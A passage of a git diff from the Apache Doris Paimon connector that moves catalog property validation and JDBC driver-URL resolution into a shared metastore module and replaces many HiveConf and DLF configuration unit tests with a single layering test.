private String resolveFullDriverUrl(String driverUrl) { Map env = context != null ? context.getEnvironment() : Collections.emptyMap(); - return PaimonCatalogFactory.resolveDriverUrl(driverUrl, env); + return JdbcDriverSupport.resolveDriverUrl(driverUrl, env); } private void registerJdbcDriver(String driverUrl, String driverClassName) { diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProperties.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProperties.java index 08df7f8720c376..6d6967c0a015e2 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProperties.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProperties.java @@ -75,9 +75,9 @@ public final class PaimonConnectorProperties { // ---- REST flavor keys ---- public static final String[] REST_URI = {"paimon.rest.uri", "uri"}; - public static final String REST_TOKEN_PROVIDER = "paimon.rest.token.provider"; - public static final String REST_DLF_ACCESS_KEY_ID = "paimon.rest.dlf.access-key-id"; - public static final String REST_DLF_ACCESS_KEY_SECRET = "paimon.rest.dlf.access-key-secret"; + // REST_TOKEN_PROVIDER / REST_DLF_ACCESS_KEY_ID / REST_DLF_ACCESS_KEY_SECRET removed (P2-T03): the + // REST dlf-token requireIf is now owned by RestMetaStoreProperties (the @ConnectorProperty aliases + // live in fe-connector-metastore-spi); the connector no longer hand-checks them. // ---- JDBC flavor keys ---- public static final String[] JDBC_URI = {"uri", "paimon.jdbc.uri"}; @@ -86,18 +86,9 @@ public final class PaimonConnectorProperties { public static final String[] JDBC_DRIVER_URL = {"paimon.jdbc.driver_url", "jdbc.driver_url"}; public static final String[] JDBC_DRIVER_CLASS = {"paimon.jdbc.driver_class", "jdbc.driver_class"}; - // ---- DLF flavor keys (legacy AliyunDLFBaseProperties) ---- - public static final String[] DLF_ACCESS_KEY = {"dlf.access_key", "dlf.catalog.accessKeyId"}; - public static final String[] DLF_SECRET_KEY = {"dlf.secret_key", "dlf.catalog.accessKeySecret"}; - public static final String[] DLF_SESSION_TOKEN = {"dlf.session_token", "dlf.catalog.sessionToken"}; - public static final String DLF_REGION = "dlf.region"; - public static final String[] DLF_ENDPOINT = {"dlf.endpoint", "dlf.catalog.endpoint"}; - public static final String[] DLF_UID = {"dlf.catalog.uid", "dlf.uid"}; - public static final String[] DLF_CATALOG_ID = {"dlf.catalog.id", "dlf.catalog_id"}; - public static final String[] DLF_ACCESS_PUBLIC = {"dlf.access.public", "dlf.catalog.accessPublic"}; - public static final String DLF_ACCESS_PUBLIC_DEFAULT = "false"; - public static final String[] DLF_PROXY_MODE = {"dlf.catalog.proxyMode", "dlf.proxy.mode"}; - public static final String DLF_PROXY_MODE_DEFAULT = "DLF_ONLY"; + // DLF flavor keys removed (P2-T03): the dlf.catalog.* assembly + endpoint-from-region derivation + + // validation moved to DlfMetaStoreProperties in fe-connector-metastore-spi (its @ConnectorProperty + // aliases are the single source of truth); the connector keeps only appendDlfOptions' literal Options. private PaimonConnectorProperties() { } diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProvider.java index bd9c89c65c3092..35efd3ecf14d5b 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProvider.java @@ -18,9 +18,11 @@ package org.apache.doris.connector.paimon; import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.metastore.spi.MetaStoreProviders; import org.apache.doris.connector.spi.ConnectorContext; import org.apache.doris.connector.spi.ConnectorProvider; +import java.util.Collections; import java.util.Map; /** @@ -42,13 +44,18 @@ public Connector create(Map properties, ConnectorContext context } /** - * Validates catalog properties at CREATE CATALOG time via the pure flavor-assembly core, - * mirroring the legacy fe-core per-flavor {@code initNormalizeAndCheckProps}/ - * {@code checkRequiredProperties} rules. Throws {@link IllegalArgumentException}, which the - * caller ({@code PluginDrivenExternalCatalog.checkProperties}) wraps into a DdlException. + * Validates catalog properties at CREATE CATALOG time via the shared metastore parsers (P2-T03): + * {@link MetaStoreProviders#bind} selects the backend by {@code paimon.catalog.type} and the bound + * {@code MetaStoreProperties.validate()} enforces the per-flavor fail-fast rules (warehouse, uri, + * HMS kerberos forbidIf/requireIf, DLF AK/SK + endpoint-or-region + OSS storage, JDBC + * driver_class-when-driver_url, REST dlf-token AK/SK). These restore the true-legacy + * {@code HMSBaseProperties}/{@code AliyunDLFBaseProperties}/{@code ParamRules} rules. Storage is not + * needed for validation, so an empty storage map is passed; an unknown {@code paimon.catalog.type} + * makes {@code bind} throw (no provider supports it). Throws {@link IllegalArgumentException}, which + * the caller ({@code PluginDrivenExternalCatalog.checkProperties}) wraps into a DdlException. */ @Override public void validateProperties(Map properties) { - PaimonCatalogFactory.validate(properties); + MetaStoreProviders.bind(properties, Collections.emptyMap()).validate(); } } diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index 63987ab341c7e0..1ac2edc6e3e950 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -23,6 +23,7 @@ import org.apache.doris.connector.api.pushdown.ConnectorExpression; import org.apache.doris.connector.api.scan.ConnectorScanPlanProvider; import org.apache.doris.connector.api.scan.ConnectorScanRange; +import org.apache.doris.connector.metastore.spi.JdbcDriverSupport; import org.apache.doris.connector.spi.ConnectorContext; import org.apache.doris.filesystem.properties.StorageProperties; import org.apache.doris.thrift.TColumnType; @@ -1051,7 +1052,7 @@ Map getBackendPaimonOptions() { properties, PaimonConnectorProperties.JDBC_DRIVER_URL); if (driverUrl != null) { Map env = context != null ? context.getEnvironment() : Collections.emptyMap(); - options.put("jdbc.driver_url", PaimonCatalogFactory.resolveDriverUrl(driverUrl, env)); + options.put("jdbc.driver_url", JdbcDriverSupport.resolveDriverUrl(driverUrl, env)); String driverClass = PaimonCatalogFactory.firstNonBlank( properties, PaimonConnectorProperties.JDBC_DRIVER_CLASS); if (driverClass != null) { diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java index 48da58b431c91b..6906c57c884f17 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java @@ -23,7 +23,6 @@ import org.junit.jupiter.api.Assertions; import org.junit.jupiter.api.Test; -import java.util.Collections; import java.util.HashMap; import java.util.Map; @@ -205,131 +204,6 @@ public void restBuildOptionsOmitsBlankWarehouse() { "buildCatalogOptions must not emit a warehouse option when the warehouse is blank"); } - // --------------------------------------------------------------------- - // validate — fail-fast - // --------------------------------------------------------------------- - - @Test - public void validateRejectsUnknownFlavor() { - // WHY: an unknown paimon.catalog.type must fail at CREATE CATALOG, not silently fall back - // to filesystem (the pre-B1 stub bug). MUTATION: removing the flavor whitelist check -> red. - IllegalArgumentException ex = Assertions.assertThrows(IllegalArgumentException.class, - () -> PaimonCatalogFactory.validate(props("paimon.catalog.type", "bogus", "warehouse", "/wh"))); - Assertions.assertTrue(ex.getMessage().contains("bogus")); - } - - @Test - public void validateRequiresWarehouseForFilesystem() { - // WHY: filesystem/hms/jdbc/dlf all need a warehouse; missing it must fail fast. - // MUTATION: dropping the warehouse-required check for filesystem -> red. - Assertions.assertThrows(IllegalArgumentException.class, - () -> PaimonCatalogFactory.validate(props("paimon.catalog.type", "filesystem"))); - } - - @Test - public void validateRequiresWarehouseForRest() { - // WHY (legacy parity): the base AbstractPaimonProperties declares warehouse as a required - // @ConnectorProperty and PaimonRestMetaStoreProperties does NOT override it, so legacy - // REJECTS a REST catalog without warehouse. validate must require warehouse for rest too, - // not exempt it. MUTATION: re-adding a REST exemption to the warehouse-required check - // (rest-without-warehouse passing) -> red. - Assertions.assertThrows(IllegalArgumentException.class, - () -> PaimonCatalogFactory.validate(props( - "paimon.catalog.type", "rest", - "paimon.rest.uri", "http://rest:8080"))); - } - - @Test - public void validateRestDlfTokenProviderRequiresAkSk() { - // WHY: legacy ParamRules.requireIf — when the REST token provider is "dlf", the dlf - // access-key-id AND access-key-secret are mandatory. MUTATION: removing the requireIf -> red. - // NOTE: warehouse is supplied so the throw exercises the Ak/Sk requireIf, not the - // warehouse-required check. - Assertions.assertThrows(IllegalArgumentException.class, - () -> PaimonCatalogFactory.validate(props( - "paimon.catalog.type", "rest", - "warehouse", "/wh", - "paimon.rest.uri", "http://rest:8080", - "paimon.rest.token.provider", "dlf"))); - } - - @Test - public void validateJdbcDriverUrlWithoutDriverClassFails() { - // WHY: legacy getBackendPaimonOptions/registerJdbcDriver require driver_class whenever a - // driver_url is given (otherwise the driver cannot be loaded). MUTATION: removing that - // coupling check -> red. - Assertions.assertThrows(IllegalArgumentException.class, - () -> PaimonCatalogFactory.validate(props( - "paimon.catalog.type", "jdbc", - "warehouse", "/wh", - "uri", "jdbc:mysql://db:3306/meta", - "paimon.jdbc.driver_url", "mysql.jar"))); - } - - @Test - public void validateDlfRequiresAccessKey() { - // WHY: legacy AliyunDLFBaseProperties.buildRules requires dlf.access_key (and secret_key). - // MUTATION: removing the access-key required check -> red. - Assertions.assertThrows(IllegalArgumentException.class, - () -> PaimonCatalogFactory.validate(props( - "paimon.catalog.type", "dlf", - "warehouse", "/wh", - "dlf.secret_key", "sk", - "dlf.endpoint", "dlf.cn.aliyuncs.com"))); - } - - @Test - public void validateDlfRequiresEndpointOrRegion() { - // WHY: legacy DLF derives the endpoint from the region; if BOTH endpoint and region are - // blank it throws "dlf.endpoint is required." MUTATION: removing the endpoint-or-region - // check -> red. - IllegalArgumentException ex = Assertions.assertThrows(IllegalArgumentException.class, - () -> PaimonCatalogFactory.validate(props( - "paimon.catalog.type", "dlf", - "warehouse", "/wh", - "dlf.access_key", "ak", - "dlf.secret_key", "sk"))); - Assertions.assertTrue(ex.getMessage().contains("dlf.endpoint")); - } - - @Test - public void validateHmsRequiresUri() { - // WHY: the hms flavor cannot connect without a metastore uri; legacy HMSBaseProperties - // requires hive.metastore.uris (or the uri alias). MUTATION: removing the hms uri check -> red. - Assertions.assertThrows(IllegalArgumentException.class, - () -> PaimonCatalogFactory.validate(props( - "paimon.catalog.type", "hms", - "warehouse", "/wh"))); - } - - @Test - public void validateAcceptsEachWellFormedFlavor() { - // WHY: the happy path for every flavor must pass cleanly — a validator that rejects valid - // configs is as broken as one that accepts invalid ones. MUTATION: an over-eager required - // check on any flavor -> red. - Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.validate( - props("paimon.catalog.type", "filesystem", "warehouse", "/wh"))); - Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.validate(props( - "paimon.catalog.type", "hms", "warehouse", "/wh", "hive.metastore.uris", "thrift://nn:9083"))); - Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.validate(props( - "paimon.catalog.type", "rest", "warehouse", "/wh", "paimon.rest.uri", "http://rest:8080"))); - Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.validate(props( - "paimon.catalog.type", "jdbc", "warehouse", "/wh", "uri", "jdbc:mysql://db:3306/meta"))); - Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.validate(props( - "paimon.catalog.type", "dlf", "warehouse", "/wh", - "dlf.access_key", "ak", "dlf.secret_key", "sk", "dlf.region", "cn-hangzhou"))); - } - - @Test - public void validateDefaultsToFilesystemWhenTypeAbsent() { - // WHY: an absent paimon.catalog.type defaults to filesystem (DEFAULT_CATALOG_TYPE), which - // then requires a warehouse. MUTATION: defaulting to something else, or not requiring - // warehouse on the implicit-filesystem path -> red. - Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.validate(props("warehouse", "/wh"))); - Assertions.assertThrows(IllegalArgumentException.class, - () -> PaimonCatalogFactory.validate(props("not-a-type", "x"))); - } - // --------------------------------------------------------------------- // buildHadoopConfiguration — storage-config overlay + paimon.* re-key + raw passthrough // (P1-T03: the canonical object-store translation now arrives pre-computed in storageHadoopConfig @@ -415,370 +289,40 @@ public void buildHadoopConfigurationPaimonPrefixOverridesStorageConfig() { } // --------------------------------------------------------------------- - // buildHmsHiveConf — metastore uri + hive.* verbatim + auth key + storage overlay + // assembleHiveConf — seed optional base (hive.conf.resources) THEN overlay shared-parser overrides + // (the HiveConf key CONTENT for hms/dlf is produced + parity-tested by fe-connector-metastore-spi's + // HmsMetaStorePropertiesImplTest / DlfMetaStorePropertiesImplTest; here we pin only the F2 layering) // --------------------------------------------------------------------- @Test - public void buildHmsHiveConfSetsUriHiveKeysAuthAndStorage() { - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( - "uri", "thrift://nn:9083", - "hive.metastore.sasl.enabled", "true", - "hive.metastore.client.principal", "doris@REALM", - "hive.metastore.client.keytab", "/etc/doris.keytab", - "hadoop.security.authentication", "kerberos", - "paimon.s3.access-key", "ak"), Collections.emptyMap(), Collections.emptyMap()); - - // WHY: a live HiveCatalog reads the metastore uri from the HiveConf, honors any user hive.* - // override, and needs the auth keys (alongside the FE-injected UGI). The "uri" alias must - // resolve to hive.metastore.uris, and the paimon.s3.* key must re-key onto fs.s3a. via the - // connector overlay. MUTATION: missing metastore uri, dropping a hive.* override, dropping an - // auth key, or not applying the connector storage overlay -> red. - Assertions.assertEquals("thrift://nn:9083", hc.get("hive.metastore.uris")); - Assertions.assertEquals("true", hc.get("hive.metastore.sasl.enabled")); - Assertions.assertEquals("doris@REALM", hc.get("hive.metastore.client.principal")); - Assertions.assertEquals("/etc/doris.keytab", hc.get("hive.metastore.client.keytab")); - Assertions.assertEquals("kerberos", hc.get("hadoop.security.authentication")); - Assertions.assertEquals("ak", hc.get("fs.s3a.access-key")); - } - - @Test - public void buildHmsHiveConfOverlaysStorageHadoopConfig() { - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf( - props("uri", "thrift://nn:9083"), - Collections.emptyMap(), - storage("fs.s3a.access.key", "ak", "fs.s3a.endpoint", "s3.amazonaws.com")); - - // WHY (P1-T03): the HMS HiveConf must carry the pre-computed object-store storage config so the - // live HiveCatalog can read warehouse data files over S3. MUTATION: not overlaying - // storageHadoopConfig (fs.s3a.access.key null) -> red. - Assertions.assertEquals("ak", hc.get("fs.s3a.access.key")); - Assertions.assertEquals("s3.amazonaws.com", hc.get("fs.s3a.endpoint")); - Assertions.assertEquals("thrift://nn:9083", hc.get("hive.metastore.uris")); - } + public void assembleHiveConfSeedsBaseThenOverridesWin() { + // WHY (F2): an external hive-site.xml (hive.conf.resources, loaded FE-side) is the BASE; the + // connection/user overrides from the shared parser must be applied ON TOP so they win, while + // base-only keys survive. MUTATION: applying overrides FIRST (base clobbers them) -> red. + Map base = new HashMap<>(); + base.put("hive.metastore.sasl.qop", "auth-conf"); // base-only key, must survive + base.put("hive.metastore.uris", "thrift://from-file:9083"); // overridden below + Map overrides = new HashMap<>(); + overrides.put("hive.metastore.uris", "thrift://from-override:9083"); // wins over base + overrides.put("hadoop.username", "doris"); // override-only key - @Test - public void buildHmsHiveConfKerberosSetsSaslServicePrincipalAndAuthToLocal() { - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( - "uri", "thrift://nn:9083", - "hive.metastore.authentication.type", "kerberos", - "hive.metastore.client.principal", "doris@REALM", - "hive.metastore.client.keytab", "/etc/doris.keytab", - "hive.metastore.service.principal", "hive/_HOST@REALM", - "hadoop.security.auth_to_local", "RULE:[1:$1@$0](.*@REALM)s/@.*//"), - Collections.emptyMap(), Collections.emptyMap()); - - // WHY (I-2 parity gap): legacy HMSBaseProperties.initHadoopAuthenticator, when the metastore - // auth type is kerberos, sets hive.metastore.sasl.enabled=true + - // hadoop.security.authentication=kerberos (lines 160-167), promotes the SERVICE principal to - // hive.metastore.kerberos.principal (sourced from hive.metastore.service.principal, lines - // 153-155), and carries hadoop.security.auth_to_local (lines 156-159). Without SASL + the - // service principal a live HiveMetaStoreClient cannot complete the GSSAPI handshake against a - // kerberized HMS. MUTATION: dropping sasl.enabled, the service principal, auth_to_local, or - // not forcing hadoop.security.authentication=kerberos -> red. - Assertions.assertEquals("true", hc.get("hive.metastore.sasl.enabled")); - Assertions.assertEquals("kerberos", hc.get("hadoop.security.authentication")); - Assertions.assertEquals("hive/_HOST@REALM", hc.get("hive.metastore.kerberos.principal")); - Assertions.assertEquals("RULE:[1:$1@$0](.*@REALM)s/@.*//", hc.get("hadoop.security.auth_to_local")); - } + HiveConf hc = PaimonCatalogFactory.assembleHiveConf(base, overrides); - @Test - public void buildHmsHiveConfKerberosAcceptsServicePrincipalAlias() { - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( - "uri", "thrift://nn:9083", - "hive.metastore.authentication.type", "kerberos", - "hive.metastore.client.principal", "doris@REALM", - "hive.metastore.client.keytab", "/etc/doris.keytab", - // alias: legacy @ConnectorProperty(names={"hive.metastore.service.principal", - // "hive.metastore.kerberos.principal"}) — the bare kerberos.principal key is the - // service-principal alias when service.principal is absent. - "hive.metastore.kerberos.principal", "hive/_HOST@REALM"), - Collections.emptyMap(), Collections.emptyMap()); - - // WHY (I-2 alias parity): the service principal can arrive under either alias; the - // hive.* verbatim copy already lands hive.metastore.kerberos.principal, but the alias - // resolution must still treat it as the service principal source (and not get clobbered by a - // blank service.principal). MUTATION: not reading the kerberos.principal alias as the service - // principal -> red. - Assertions.assertEquals("hive/_HOST@REALM", hc.get("hive.metastore.kerberos.principal")); - Assertions.assertEquals("true", hc.get("hive.metastore.sasl.enabled")); - } - - @Test - public void buildHmsHiveConfKerberosSurvivesSimpleHdfsAuthPassthrough() { - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( - "uri", "thrift://nn:9083", - "hive.metastore.authentication.type", "kerberos", - "hive.metastore.client.principal", "doris@REALM", - "hive.metastore.client.keytab", "/etc/doris.keytab", - "hadoop.security.authentication", "simple"), - Collections.emptyMap(), Collections.emptyMap()); - - // WHY (pre-existing MAJOR, found by the FIX-FECONF impl review): legacy runs initHadoopAuthenticator - // LAST, so a kerberized HMS forces hadoop.security.authentication=kerberos authoritatively even when - // the HDFS namenode uses simple auth (a real kerberized-HMS + simple-HDFS deployment). The connector's - // raw hadoop.* passthrough in applyStorageConfig re-copies the literal hadoop.security.authentication= - // simple, so if the kerberos block runs BEFORE the overlay the forced "kerberos" is clobbered back to - // "simple" while sasl.enabled stays "true" -> an inconsistent HiveConf that breaks the live GSSAPI - // handshake. The kerberos block must therefore run AFTER applyStorageConfig. MUTATION: kerberos block - // before the storage overlay -> hadoop.security.authentication clobbered to "simple" -> red. - Assertions.assertEquals("kerberos", hc.get("hadoop.security.authentication")); - Assertions.assertEquals("true", hc.get("hive.metastore.sasl.enabled")); - } - - @Test - public void buildHmsHiveConfKerberosSurvivesStorageOverlayAuthPassthrough() { - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( - "uri", "thrift://nn:9083", - "hive.metastore.authentication.type", "kerberos", - "hive.metastore.client.principal", "doris@REALM", - "hive.metastore.client.keytab", "/etc/doris.keytab"), - Collections.emptyMap(), - // a storage map that carries a hadoop.security.authentication must NOT clobber the - // forced kerberos auth. - storage("hadoop.security.authentication", "simple")); - - // WHY (P1-T03 ordering invariant, sibling to ...SurvivesSimpleHdfsAuthPassthrough): P1-T03 moved - // the object-store config source to the storageHadoopConfig map, which applyStorageConfig applies - // BEFORE the kerberos-conditional block (the same position the old fe-property canonical map held). - // So a hadoop.security.authentication arriving via the STORAGE MAP (not just the raw props - // passthrough) must still be overridden to kerberos — proving the kerberos block runs after the - // storage overlay regardless of which source set the key. MUTATION: applying storageHadoopConfig - // AFTER the kerberos block (or dropping the force) -> "simple" wins -> red. - Assertions.assertEquals("kerberos", hc.get("hadoop.security.authentication")); - Assertions.assertEquals("true", hc.get("hive.metastore.sasl.enabled")); - } - - @Test - public void buildHmsHiveConfSimpleDoesNotEnableSasl() { - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( - "uri", "thrift://nn:9083", - "hive.metastore.authentication.type", "simple"), - Collections.emptyMap(), Collections.emptyMap()); - - // WHY (I-2 negative parity): legacy only enables SASL on the kerberos branch; a simple - // (non-kerberized) HMS must NOT advertise sasl.enabled=true or it would attempt a GSSAPI - // handshake against a plaintext metastore and fail. (HiveConf carries a baked-in default of - // "false", so the invariant is "not true", not "absent" — legacy likewise never sets it to - // true on the simple path.) MUTATION: unconditionally setting sasl.enabled=true regardless of - // auth type -> red. - Assertions.assertNotEquals("true", hc.get("hive.metastore.sasl.enabled"), - "simple-auth HMS must not enable metastore SASL"); - } - - @Test - public void buildHmsHiveConfSetsClientSocketTimeoutDefault() { - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf( - props("uri", "thrift://nn:9083"), Collections.emptyMap(), Collections.emptyMap()); - - // WHY (I-2): legacy checkAndInit defaults the metastore client socket timeout to - // Config.hive_metastore_client_timeout_second (=10) when the user has not overridden it - // (lines 204-208), so a hung metastore does not block CREATE CATALOG forever. MUTATION: - // dropping the default timeout -> red. - Assertions.assertEquals("10", hc.get("hive.metastore.client.socket.timeout")); - } - - // --------------------------------------------------------------------- - // requireOssStorageForDlf — OSS-only gate (legacy OSS||OSS_HDFS, NOT generic S3) - // --------------------------------------------------------------------- - - @Test - public void requireOssStorageForDlfRejectsS3OnlyConfig() { - // WHY (I-1 parity): legacy PaimonAliyunDLFMetaStoreProperties.initializeCatalog required a - // StorageProperties of Type.OSS || OSS_HDFS specifically — a generic S3 backend is NOT - // accepted. A DLF catalog configured with only s3.* keys (no oss) must be rejected as - // misconfigured, with the exact legacy message. MUTATION: loosening the gate to also accept - // s3 prefixes (so an s3-only DLF catalog passes) -> red. - IllegalStateException ex = Assertions.assertThrows(IllegalStateException.class, - () -> PaimonCatalogFactory.requireOssStorageForDlf(props( - "s3.access-key", "ak", - "fs.s3a.endpoint", "s3.amazonaws.com", - "paimon.s3.secret-key", "sk"))); - Assertions.assertEquals("Paimon DLF metastore requires OSS storage properties.", ex.getMessage()); - } - - @Test - public void requireOssStorageForDlfAcceptsOssConfig() { - // WHY (I-1 parity): an OSS-backed DLF catalog is the supported case; the gate must pass when - // any oss./fs.oss./paimon.fs.oss. key is present. MUTATION: a gate that rejects a valid - // OSS-backed DLF catalog -> red. - Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.requireOssStorageForDlf(props( - "oss.endpoint", "oss-cn-hangzhou.aliyuncs.com"))); - Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.requireOssStorageForDlf(props( - "fs.oss.endpoint", "oss-cn-hangzhou.aliyuncs.com"))); - Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.requireOssStorageForDlf(props( - "paimon.fs.oss.access-key", "oss-ak"))); - } - - // --------------------------------------------------------------------- - // buildDlfHiveConf — 8 dlf.catalog.* keys + endpoint-from-region + uid fallback + throw + storage - // --------------------------------------------------------------------- - - @Test - public void buildDlfHiveConfSetsAllEightDlfKeysAndOverlaysStorage() { - HiveConf hc = PaimonCatalogFactory.buildDlfHiveConf(props( - "dlf.access_key", "ak", - "dlf.secret_key", "sk", - "dlf.session_token", "tok", - "dlf.region", "cn-hangzhou", - "dlf.endpoint", "dlf.cn-hangzhou.aliyuncs.com", - "dlf.catalog.uid", "uid-1", - "dlf.catalog.id", "cat-1", - "dlf.catalog.proxyMode", "DLF_ONLY", - "paimon.fs.oss.access-key", "oss-ak"), Collections.emptyMap()); - - // WHY: DLF is adapted onto a HiveCatalog via the ProxyMetaStoreClient, which reads the eight - // DataLakeConfig.CATALOG_* keys from the HiveConf; all eight must be present with the - // verified literal key names, plus the connector storage overlay (here the paimon.fs.oss.* - // re-key onto fs.s3a.). MUTATION: a wrong/missing dlf.catalog.* key name, or not applying the - // connector storage overlay -> red. - Assertions.assertEquals("ak", hc.get("dlf.catalog.accessKeyId")); - Assertions.assertEquals("sk", hc.get("dlf.catalog.accessKeySecret")); - Assertions.assertEquals("tok", hc.get("dlf.catalog.securityToken")); - Assertions.assertEquals("cn-hangzhou", hc.get("dlf.catalog.region")); - Assertions.assertEquals("dlf.cn-hangzhou.aliyuncs.com", hc.get("dlf.catalog.endpoint")); - Assertions.assertEquals("uid-1", hc.get("dlf.catalog.uid")); - Assertions.assertEquals("cat-1", hc.get("dlf.catalog.id")); - Assertions.assertEquals("DLF_ONLY", hc.get("dlf.catalog.proxyMode")); - Assertions.assertEquals("oss-ak", hc.get("fs.s3a.access-key")); - } - - @Test - public void buildDlfHiveConfOverlaysStorageHadoopConfig() { - HiveConf hc = PaimonCatalogFactory.buildDlfHiveConf( - props("dlf.access_key", "ak", - "dlf.secret_key", "sk", - "dlf.endpoint", "dlf.cn-hangzhou.aliyuncs.com"), - storage("fs.oss.accessKeyId", "oak", - "fs.oss.impl", "com.aliyun.jindodata.oss.JindoOssFileSystem")); - - // WHY (P1-T03): the DLF HiveConf must carry the pre-computed OSS storage config (Jindo fs.oss.*) - // from fe-filesystem so the ProxyMetaStoreClient/FileIO can read OSS data files, while the - // dlf.catalog.* metastore keys stay present. MUTATION: not overlaying storageHadoopConfig - // (fs.oss.accessKeyId null) -> red. - Assertions.assertEquals("oak", hc.get("fs.oss.accessKeyId")); - Assertions.assertEquals("com.aliyun.jindodata.oss.JindoOssFileSystem", hc.get("fs.oss.impl")); - Assertions.assertEquals("ak", hc.get("dlf.catalog.accessKeyId")); - } - - @Test - public void buildDlfHiveConfDerivesVpcEndpointFromRegionByDefault() { - HiveConf hc = PaimonCatalogFactory.buildDlfHiveConf(props( - "dlf.access_key", "ak", - "dlf.secret_key", "sk", - "dlf.region", "cn-beijing", - "dlf.catalog.uid", "uid-1"), Collections.emptyMap()); - - // WHY: legacy checkAndInit derives the endpoint from the region when the endpoint is blank; - // the DEFAULT (accessPublic=false) is the VPC endpoint. MUTATION: deriving the public - // endpoint by default, or not deriving at all -> red. - Assertions.assertEquals("dlf-vpc.cn-beijing.aliyuncs.com", hc.get("dlf.catalog.endpoint")); - } - - @Test - public void buildDlfHiveConfDerivesPublicEndpointWhenAccessPublic() { - HiveConf hc = PaimonCatalogFactory.buildDlfHiveConf(props( - "dlf.access_key", "ak", - "dlf.secret_key", "sk", - "dlf.region", "cn-beijing", - "dlf.access.public", "true", - "dlf.catalog.uid", "uid-1"), Collections.emptyMap()); - - // WHY: when dlf.access.public is truthy the public endpoint (dlf....) is used instead - // of the VPC one. MUTATION: ignoring accessPublic (still deriving the vpc endpoint) -> red. - Assertions.assertEquals("dlf.cn-beijing.aliyuncs.com", hc.get("dlf.catalog.endpoint")); - } - - @Test - public void buildDlfHiveConfFallsBackCatalogIdToUid() { - HiveConf hc = PaimonCatalogFactory.buildDlfHiveConf(props( - "dlf.access_key", "ak", - "dlf.secret_key", "sk", - "dlf.endpoint", "dlf.cn-hangzhou.aliyuncs.com", - "dlf.catalog.uid", "uid-42"), Collections.emptyMap()); - - // WHY: legacy checkAndInit defaults the catalog id to the uid when no explicit catalog id is - // given (the DLF account's default catalog is keyed by uid). MUTATION: leaving the catalog - // id blank instead of falling back to uid -> red. - Assertions.assertEquals("uid-42", hc.get("dlf.catalog.id")); - } - - @Test - public void buildDlfHiveConfThrowsWhenEndpointAndRegionBlank() { - // WHY: legacy checkAndInit throws "dlf.endpoint is required." when neither an endpoint nor a - // region (to derive one) is given — the DLF client cannot connect without it. MUTATION: - // removing the throw (returning a HiveConf with a blank endpoint) -> red. - IllegalStateException ex = Assertions.assertThrows(IllegalStateException.class, - () -> PaimonCatalogFactory.buildDlfHiveConf(props( - "dlf.access_key", "ak", - "dlf.secret_key", "sk", - "dlf.catalog.uid", "uid-1"), Collections.emptyMap())); - Assertions.assertTrue(ex.getMessage().contains("dlf.endpoint")); - } - - // --------------------------------------------------------------------- - // FIX-HMS-CONFRES — buildHmsHiveConf(props, hiveConfResources, storage) base-merge - // --------------------------------------------------------------------- - - @Test - public void buildHmsHiveConfOverlaysResolvedHiveConfResourcesAsBase() { - Map fileKeys = new HashMap<>(); - fileKeys.put("hive.metastore.sasl.qop", "auth-conf"); - fileKeys.put("hive.metastore.thrift.transport", "custom"); - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf( - props("uri", "thrift://nn:9083"), fileKeys, Collections.emptyMap()); - - // WHY (MAJOR, Finding §8): connection-critical keys present ONLY in the external hive-site.xml - // (hive.conf.resources) must reach the catalog HiveConf — before the fix buildHmsHiveConf - // built the conf from the raw prop map only and dropped the file entirely. MUTATION: dropping - // the file-keys base merge (today's behavior) -> these keys absent -> red. Assertions.assertEquals("auth-conf", hc.get("hive.metastore.sasl.qop")); - Assertions.assertEquals("custom", hc.get("hive.metastore.thrift.transport")); - Assertions.assertEquals("thrift://nn:9083", hc.get("hive.metastore.uris")); + Assertions.assertEquals("thrift://from-override:9083", hc.get("hive.metastore.uris")); + Assertions.assertEquals("doris", hc.get("hadoop.username")); } @Test - public void buildHmsHiveConfUserHivePropOverridesFileResource() { - // A non-uri hive.* key avoids the separate uri-alias resolution (HMS_URI), isolating 